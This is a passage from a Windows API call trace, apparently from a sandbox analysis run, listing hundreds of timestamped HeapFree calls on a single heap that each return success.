dwFlags=0x0, lpMem=0x1e73290 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1e864a0 | out: hHeap=0x480000) returned 1 [0102.855] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1e996b0 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1eac8c0 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1ebfad0 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1ed2ce0 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1ee5ef0 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1ef9100 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1f0c310 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1f1f520 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1f32730 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1f60080 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1f73290 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1f864a0 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1f996b0 | out: hHeap=0x480000) returned 1 [0102.856] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1fac8c0 | out: hHeap=0x480000) returned 1 [0102.866] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1fbfad0 | out: hHeap=0x480000) returned 1 [0102.866] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1fd2ce0 | out: hHeap=0x480000) returned 1 [0102.866] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1fe5ef0 | out: hHeap=0x480000) returned 1 [0102.866] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1ff9100 | out: hHeap=0x480000) returned 1 [0102.867] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x200c310 | out: hHeap=0x480000) returned 1 [0102.867] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x201f520 | out: hHeap=0x480000) returned 1 [0102.867] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2032730 | out: hHeap=0x480000) returned 1 [0102.867] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2045940 | out: hHeap=0x480000) returned 1 [0102.867] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2058b50 | out: hHeap=0x480000) returned 1 [0103.136] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x206bd60 | out: hHeap=0x480000) returned 1 [0103.136] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x207ef70 | out: hHeap=0x480000) returned 1 [0103.136] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2092180 | out: hHeap=0x480000) returned 1 [0103.136] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x20a5390 | out: hHeap=0x480000) returned 1 [0103.136] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x20b85a0 | out: hHeap=0x480000) returned 1 [0103.136] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x20cb7b0 | out: hHeap=0x480000) returned 1 [0103.136] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x20de9c0 | out: hHeap=0x480000) returned 1 [0103.136] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x20f1bd0 | out: hHeap=0x480000) returned 1 [0103.136] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2104de0 | out: hHeap=0x480000) returned 1 [0103.136] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2117ff0 | out: hHeap=0x480000) returned 1 [0103.136] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x212b200 | out: hHeap=0x480000) returned 1 [0103.136] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x213e410 | out: hHeap=0x480000) returned 1 [0103.137] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2160080 | out: hHeap=0x480000) returned 1 [0103.137] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2173290 | out: hHeap=0x480000) returned 1 [0103.142] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x21864a0 | out: hHeap=0x480000) returned 1 [0103.142] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x21996b0 | out: hHeap=0x480000) returned 1 [0103.142] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x21ac8c0 | out: hHeap=0x480000) returned 1 [0103.142] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x21bfad0 | out: hHeap=0x480000) returned 1 [0103.142] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x21d2ce0 | out: hHeap=0x480000) returned 1 [0103.142] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x21e5ef0 | out: hHeap=0x480000) returned 1 [0103.142] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x21f9100 | out: hHeap=0x480000) returned 1 [0103.142] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x220c310 | out: hHeap=0x480000) returned 1 [0103.142] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x221f520 | out: hHeap=0x480000) returned 1 [0103.142] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2232730 | out: hHeap=0x480000) returned 1 [0103.142] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2245940 | out: hHeap=0x480000) returned 1 [0103.142] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2258b50 | out: hHeap=0x480000) returned 1 [0103.146] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x226bd60 | out: hHeap=0x480000) returned 1 [0103.146] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x227ef70 | out: hHeap=0x480000) returned 1 [0103.147] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2292180 | out: hHeap=0x480000) returned 1 [0103.147] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x22a5390 | out: hHeap=0x480000) returned 1 [0103.147] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x22b85a0 | out: hHeap=0x480000) returned 1 [0103.147] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x22cb7b0 | out: hHeap=0x480000) returned 1 [0103.147] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x22de9c0 | out: hHeap=0x480000) returned 1 [0103.147] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x22f1bd0 | out: hHeap=0x480000) returned 1 [0103.147] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2304de0 | out: hHeap=0x480000) returned 1 [0103.147] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2317ff0 | out: hHeap=0x480000) returned 1 [0103.150] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x232b200 | out: hHeap=0x480000) returned 1 [0103.151] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x233e410 | out: hHeap=0x480000) returned 1 [0103.151] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2351620 | out: hHeap=0x480000) returned 1 [0103.151] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2364830 | out: hHeap=0x480000) returned 1 [0103.154] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2377a40 | out: hHeap=0x480000) returned 1 [0103.154] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x238ac50 | out: hHeap=0x480000) returned 1 [0103.154] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x239de60 | out: hHeap=0x480000) returned 1 [0103.154] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x23b1070 | out: hHeap=0x480000) returned 1 [0103.154] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x23c4280 | out: hHeap=0x480000) returned 1 [0103.154] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x23d7490 | out: hHeap=0x480000) returned 1 [0103.154] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x23ea6a0 | out: hHeap=0x480000) returned 1 [0103.154] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x23fd8b0 | out: hHeap=0x480000) returned 1 [0103.154] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2410ac0 | out: hHeap=0x480000) returned 1 [0103.155] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2423cd0 | out: hHeap=0x480000) returned 1 [0103.155] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2436ee0 | out: hHeap=0x480000) returned 1 [0103.155] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x244a0f0 | out: hHeap=0x480000) returned 1 [0103.155] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x245d300 | out: hHeap=0x480000) returned 1 [0103.155] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2470510 | out: hHeap=0x480000) returned 1 [0103.159] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2483720 | out: hHeap=0x480000) returned 1 [0103.159] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2496930 | out: hHeap=0x480000) returned 1 [0103.160] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x480000) returned 1 [0103.160] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x24bcd50 | out: hHeap=0x480000) returned 1 [0103.160] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x24cff60 | out: hHeap=0x480000) returned 1 [0103.160] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x24e3170 | out: hHeap=0x480000) returned 1 [0103.160] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x24f6380 | out: hHeap=0x480000) returned 1 [0103.160] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2509590 | out: hHeap=0x480000) returned 1 [0103.160] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x251c7a0 | out: hHeap=0x480000) returned 1 [0103.160] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x252f9b0 | out: hHeap=0x480000) returned 1 [0103.160] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2542bc0 | out: hHeap=0x480000) returned 1 [0103.161] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2560080 | out: hHeap=0x480000) returned 1 [0103.161] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2573290 | out: hHeap=0x480000) returned 1 [0103.161] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x25864a0 | out: hHeap=0x480000) returned 1 [0103.161] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x25996b0 | out: hHeap=0x480000) returned 1 [0103.161] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x25ac8c0 | out: hHeap=0x480000) returned 1 [0103.161] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x25bfad0 | out: hHeap=0x480000) returned 1 [0103.161] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x25d2ce0 | out: hHeap=0x480000) returned 1 [0103.161] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x25e5ef0 | out: hHeap=0x480000) returned 1 [0103.161] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x25f9100 | out: hHeap=0x480000) returned 1 [0103.161] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x260c310 | out: hHeap=0x480000) returned 1 [0103.167] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x261f520 | out: hHeap=0x480000) returned 1 [0103.168] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2632730 | out: hHeap=0x480000) returned 1 [0103.168] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2645940 | out: hHeap=0x480000) returned 1 [0103.168] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2658b50 | out: hHeap=0x480000) returned 1 [0103.506] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x266bd60 | out: hHeap=0x480000) returned 1 [0103.506] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x267ef70 | out: hHeap=0x480000) returned 1 [0103.506] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2692180 | out: hHeap=0x480000) returned 1 [0103.506] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x26a5390 | out: hHeap=0x480000) returned 1 [0103.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x26b85a0 | out: hHeap=0x480000) returned 1 [0103.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x26cb7b0 | out: hHeap=0x480000) returned 1 [0103.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x26de9c0 | out: hHeap=0x480000) returned 1 [0103.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x26f1bd0 | out: hHeap=0x480000) returned 1 [0103.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2704de0 | out: hHeap=0x480000) returned 1 [0103.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2717ff0 | out: hHeap=0x480000) returned 1 [0103.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x272b200 | out: hHeap=0x480000) returned 1 [0103.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x273e410 | out: hHeap=0x480000) returned 1 [0103.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2751620 | out: hHeap=0x480000) returned 1 [0103.507] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2764830 | out: hHeap=0x480000) returned 1 [0103.511] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2777a40 | out: hHeap=0x480000) returned 1 [0103.511] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x278ac50 | out: hHeap=0x480000) returned 1 [0103.512] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x279de60 | out: hHeap=0x480000) returned 1 [0103.512] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x27b1070 | out: hHeap=0x480000) returned 1 [0103.512] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x27c4280 | out: hHeap=0x480000) returned 1 [0103.512] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x27d7490 | out: hHeap=0x480000) returned 1 [0103.512] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x27ea6a0 | out: hHeap=0x480000) returned 1 [0103.512] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x27fd8b0 | out: hHeap=0x480000) returned 1 [0103.512] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2810ac0 | out: hHeap=0x480000) returned 1 [0103.512] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2823cd0 | out: hHeap=0x480000) returned 1 [0103.512] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2836ee0 | out: hHeap=0x480000) returned 1 [0103.512] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x284a0f0 | out: hHeap=0x480000) returned 1 [0103.512] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x285d300 | out: hHeap=0x480000) returned 1 [0103.512] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2870510 | out: hHeap=0x480000) returned 1 [0103.516] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2883720 | out: hHeap=0x480000) returned 1 [0103.516] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2896930 | out: hHeap=0x480000) returned 1 [0103.516] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x28a9b40 | out: hHeap=0x480000) returned 1 [0103.516] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x28bcd50 | out: hHeap=0x480000) returned 1 [0103.517] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x28cff60 | out: hHeap=0x480000) returned 1 [0103.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x28e3170 | out: hHeap=0x480000) returned 1 [0103.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x28f6380 | out: hHeap=0x480000) returned 1 [0103.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2909590 | out: hHeap=0x480000) returned 1 [0103.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x291c7a0 | out: hHeap=0x480000) returned 1 [0103.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x292f9b0 | out: hHeap=0x480000) returned 1 [0103.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2942bc0 | out: hHeap=0x480000) returned 1 [0103.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2955dd0 | out: hHeap=0x480000) returned 1 [0103.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2968fe0 | out: hHeap=0x480000) returned 1 [0103.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x297c1f0 | out: hHeap=0x480000) returned 1 [0103.522] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x298f400 | out: hHeap=0x480000) returned 1 [0103.522] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x29a2610 | out: hHeap=0x480000) returned 1 [0103.522] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x29b5820 | out: hHeap=0x480000) returned 1 [0103.522] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x29c8a30 | out: hHeap=0x480000) returned 1 [0103.522] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x29dbc40 | out: hHeap=0x480000) returned 1 [0103.523] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x29eee50 | out: hHeap=0x480000) returned 1 [0103.524] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a02060 | out: hHeap=0x480000) returned 1 [0103.524] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a15270 | out: hHeap=0x480000) returned 1 [0103.524] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a28480 | out: hHeap=0x480000) returned 1 [0103.524] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a3b690 | out: hHeap=0x480000) returned 1 [0103.524] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a4e8a0 | out: hHeap=0x480000) returned 1 [0103.524] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a61ab0 | out: hHeap=0x480000) returned 1 [0103.524] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a74cc0 | out: hHeap=0x480000) returned 1 [0103.524] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a87ed0 | out: hHeap=0x480000) returned 1 [0103.528] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a9b0e0 | out: hHeap=0x480000) returned 1 [0103.528] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2aae2f0 | out: hHeap=0x480000) returned 1 [0103.528] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ac1500 | out: hHeap=0x480000) returned 1 [0103.528] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ad4710 | out: hHeap=0x480000) returned 1 [0103.528] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ae7920 | out: hHeap=0x480000) returned 1 [0103.528] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2afab30 | out: hHeap=0x480000) returned 1 [0103.530] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b0dd40 | out: hHeap=0x480000) returned 1 [0103.531] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b20f50 | out: hHeap=0x480000) returned 1 [0103.531] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b34160 | out: hHeap=0x480000) returned 1 [0103.531] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b47370 | out: hHeap=0x480000) returned 1 [0103.531] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b5a580 | out: hHeap=0x480000) returned 1 [0103.531] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b6d790 | out: hHeap=0x480000) returned 1 [0103.531] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b809a0 | out: hHeap=0x480000) returned 1 [0103.531] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b93bb0 | out: hHeap=0x480000) returned 1 [0103.534] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ba6dc0 | out: hHeap=0x480000) returned 1 [0103.534] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2bb9fd0 | out: hHeap=0x480000) returned 1 [0103.535] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2bcd1e0 | out: hHeap=0x480000) returned 1 [0103.535] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2be03f0 | out: hHeap=0x480000) returned 1 [0103.535] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2bf3600 | out: hHeap=0x480000) returned 1 [0103.535] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c06810 | out: hHeap=0x480000) returned 1 [0103.536] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c19a20 | out: hHeap=0x480000) returned 1 [0103.537] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c2cc30 | out: hHeap=0x480000) returned 1 [0103.537] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c3fe40 | out: hHeap=0x480000) returned 1 [0103.537] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c53050 | out: hHeap=0x480000) returned 1 [0103.537] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c66260 | out: hHeap=0x480000) returned 1 [0103.537] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c79470 | out: hHeap=0x480000) returned 1 [0103.537] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c8c680 | out: hHeap=0x480000) returned 1 [0103.537] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c9f890 | out: hHeap=0x480000) returned 1 [0103.727] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2cb2aa0 | out: hHeap=0x480000) returned 1 [0103.727] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2cc5cb0 | out: hHeap=0x480000) returned 1 [0103.727] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2cd8ec0 | out: hHeap=0x480000) returned 1 [0103.727] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2cec0d0 | out: hHeap=0x480000) returned 1 [0103.727] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2cff2e0 | out: hHeap=0x480000) returned 1 [0103.729] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d124f0 | out: hHeap=0x480000) returned 1 [0103.730] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d25700 | out: hHeap=0x480000) returned 1 [0103.730] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d38910 | out: hHeap=0x480000) returned 1 [0103.730] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d60080 | out: hHeap=0x480000) returned 1 [0103.730] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d73290 | out: hHeap=0x480000) returned 1 [0103.730] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d864a0 | out: hHeap=0x480000) returned 1 [0103.730] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d996b0 | out: hHeap=0x480000) returned 1 [0103.730] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2dac8c0 | out: hHeap=0x480000) returned 1 [0103.730] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2dbfad0 | out: hHeap=0x480000) returned 1 [0103.730] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2dd2ce0 | out: hHeap=0x480000) returned 1 [0103.730] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2de5ef0 | out: hHeap=0x480000) returned 1 [0103.730] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2df9100 | out: hHeap=0x480000) returned 1 [0103.735] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e0c310 | out: hHeap=0x480000) returned 1 [0103.736] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e1f520 | out: hHeap=0x480000) returned 1 [0103.736] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e32730 | out: hHeap=0x480000) returned 1 [0103.736] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e45940 | out: hHeap=0x480000) returned 1 [0103.736] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e58b50 | out: hHeap=0x480000) returned 1 [0103.739] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e6bd60 | out: hHeap=0x480000) returned 1 [0103.739] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e7ef70 | out: hHeap=0x480000) returned 1 [0103.739] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e92180 | out: hHeap=0x480000) returned 1 [0103.739] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ea5390 | out: hHeap=0x480000) returned 1 [0103.739] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2eb85a0 | out: hHeap=0x480000) returned 1 [0103.739] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ecb7b0 | out: hHeap=0x480000) returned 1 [0103.741] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ede9c0 | out: hHeap=0x480000) returned 1 [0103.742] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ef1bd0 | out: hHeap=0x480000) returned 1 [0103.742] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f04de0 | out: hHeap=0x480000) returned 1 [0103.742] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f17ff0 | out: hHeap=0x480000) returned 1 [0103.742] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f2b200 | out: hHeap=0x480000) returned 1 [0103.742] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f3e410 | out: hHeap=0x480000) returned 1 [0103.742] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f51620 | out: hHeap=0x480000) returned 1 [0103.742] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f64830 | out: hHeap=0x480000) returned 1 [0103.745] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f77a40 | out: hHeap=0x480000) returned 1 [0103.745] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f8ac50 | out: hHeap=0x480000) returned 1 [0103.746] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f9de60 | out: hHeap=0x480000) returned 1 [0103.746] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2fb1070 | out: hHeap=0x480000) returned 1 [0103.746] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2fc4280 | out: hHeap=0x480000) returned 1 [0103.746] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2fd7490 | out: hHeap=0x480000) returned 1 [0103.747] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2fea6a0 | out: hHeap=0x480000) returned 1 [0103.747] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ffd8b0 | out: hHeap=0x480000) returned 1 [0103.747] HeapFree (in: 